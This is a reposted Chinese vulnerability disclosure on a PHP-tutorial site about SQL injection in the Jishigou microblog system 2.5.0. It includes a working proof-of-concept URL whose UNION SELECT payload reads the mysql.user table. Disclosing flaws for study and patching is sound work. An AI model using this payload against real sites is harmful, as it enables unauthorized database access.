网站地图    收藏   

主页 > 后端 > 网站安全 >

记事狗2.5.0鸡肋注入漏洞 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 13:02 作者: 阅读:

[导读] 无意中发现的,只测试了记事狗微博客系统2.5.0 UTF8 Build 20110130因为系统会将_ 转换为\_ 所以像load_file、有表前缀的都不行,暂时没想到办法去绕过,作为技术挑战吧。测试方法:http://ww...

无意中发现的,只测试了“记事狗微博客系统2.5.0 UTF8 Build 20110130”
 
因为系统会将”_” 转换为”\_” 所以像”load_file”、有表前缀的都不行,暂时没想到办法去绕过,作为技术挑战吧。
 
测试方法:
 
http://www.2cto.com /index.php?code=usertag&mod=search&usertag=1″/**/and/**/1=2/**/union/**/select/**/1,2,host,4/**/from/**/mysql.user%23
 
EXP不会造成严重影响,且仅供研究之用

摘自 疯子博客|Madman@SysCiC.TeAm

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论